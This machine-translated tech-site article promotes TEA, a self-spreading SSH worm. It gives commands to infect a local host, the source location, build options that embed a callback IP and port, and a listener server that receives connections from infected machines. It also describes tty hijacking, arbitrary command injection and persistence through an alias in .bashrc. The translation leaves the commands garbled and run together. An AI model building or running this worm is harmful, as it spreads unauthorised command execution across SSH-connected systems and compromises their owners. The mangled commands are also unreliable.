Shulou(Shulou.com)05/31 Report--

This article is to share with you about what TEA is. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

TEA is a SSH client worm based on TAS framework. In essence, it is a fake SSH client that can modify tty input / output to execute arbitrary commands, or upload itself through a SSH connection to achieve penetration infection.

In order for the tool to function properly, the remote host needs to meet the following conditions:

1. Display the "Last login" message when logging in

2. Dd and stty

3. Target users use Bash as the default Shell

4. Can run fakessh code

5. ~ / .bashrc is writable

Infect the local host:

Mkdir / .sshwormcp ssh ~ / .sshwormalias ssh='~/.sshworm/ssh'

When we first execute fakessh, nothing is displayed, and the tool executes the code in post-install.c and writes the string alias ssh= "~ / .sshworm / ssh" to ~ / .bashrc:

$ssh$ sshusage: ssh [- 46AaCfGgKkMNnqsTtVvXxYy] [- B bind_interface] [- b bind_address] [- c cipher_spec] [- D [bind_address:] port] [- E log_file] [- e escape_char] [- F configfile] [- I pkcs11] [- I identity_file] [- J [user@] host [: port]] [- L address] [- l login_name] [- m mac_spec] [- O ctl_cmd ] [- o option] [- p port] [- Q query_option] [- R address] [- S ctl_path] [- W host:port] [- w local_tun [: remote_tun]] destination [command] to achieve transmission and infection

We only need to connect to the target SSH server, and if the server meets the TEA operating conditions, the target device and the host connected to the target device can be successfully infected.

Tty modification:

After the Fakessh executes, it will wait for the string "Last login" to turn on the output-hooks.c. When it receives the "Last login", it will send some arbitrary instructions (inject-cmd.c) and wait for the result of the command execution (output-hooks.c). If the file ~ / .sshworm / ssh does not exist on the remote device, the worm will upload itself (upload.c).

Uninstall: $rm-rf ~ / .sshworm$ perl-I-pe's suicide alias ssh= "~ / .sshworm / ssh";; g' ~ / .bashrc$ unalias ssh compilation

I recommend that you use musl-libc, or other libc, but I do not recommend that you use glibc, because the code compiled with glibc can be very large.

Get the source code:

$git clone-- recurse-submodules https://github.com/hc0d3r/tea

Build options: name introduces IP remote IPv4 connection PORT remote port connection sample:

$make CC=musl-gcc IP=my-ipv4 PORT=1234

Server

Here we have made a simple server to handle the link, and when the post-install.c code is executed, the server will receive the link. The server mechanism is very simple. When a new link is successfully established, it will execute a new command and pass the link file descriptor through the command line to ensure that the executing program can handle the link.

Compilation: $cd server$ makecc-Wall-Wextra-O3-c net.c-o net.occ-Wall-Wextra-O3-c replace.c-o replace.occ-Wall-Wextra-O3-c term.c-o term.occ-Wall-Wextra-O3-c main.c-o main.occ-Wall-Wextra-O3-o server net.o replace.o term.o main.o tool demo

Thank you for reading! This is the end of this article on "what is TEA?". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.